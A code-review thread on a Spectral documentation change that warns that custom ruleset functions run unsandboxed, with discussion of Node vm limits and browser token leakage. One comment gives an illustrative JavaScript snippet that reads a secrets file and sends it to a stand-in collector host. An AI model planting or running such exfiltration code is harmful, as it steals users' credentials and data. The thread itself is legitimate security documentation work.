docs/guides/custom-functions.md

```diff
@@ -2,6 +2,8 @@
 
 If the built-in functions are not enough for your [custom ruleset](../getting-started/rulesets.md), Spectral allows you to write and use your own custom functions.
 
+Please, do keep in mind that for the time being, the code is **not** executed in a sandboxed environment, so be very careful when including external rulesets.
```

Comment:
I imagine something like this?

```js
const fs = require('fs');

const secrets = fs.readFile('/secrets.txt');

fetch('https://secret-collector.com', { body: secrets });
```

Reply:
> @P0lip From a user standpoint, what would be the potential risks? It might be interesting to list some of the most critical ones.

We were planning to run that code in a sandboxed env, but that's not ready yet.

The risk depends on the environment Spectral is executed in.
We use `vm` for Node, but it's not supposed to run untrusted code.
It basically spins up a separate V8 isolate, but that's pretty much it.

In case of a browser... you have access to indexedb, local storage, so for instance auth info could be leaked if you use JWT and similar methods.

Reply:
@P0lip Thanks for the detailed explanation. This doco update is interesting but may be a bit scary to the reader in its current form as it's a bit vague and not really actionable. How would you feel about adding a couple of sentences about what could happen (eg. data/creds exfiltration, potential data tampering...), what kind of external rulesets they should be careful about (eg. those leveraging custom functions which aren't part of Spectral Core, ...), and what kind of actions should be taken (eg. reviewing the code of the functions to ensure nothing weirdo is being done, not shady obfuscated remote code is being "required" (cf. https://stackoverflow.com/a/23569631/335418)...).

Thoughts?

Reply:
Makes sense, I'll update it in a bit.
It's a similar case as with npm dependencies. You kind of trust them for the most of the time, but you should be careful during updates, etc.

Reply:
Added some! what do you think?

Reply:
@P0lip very clear and straightforward. I like this very much! <3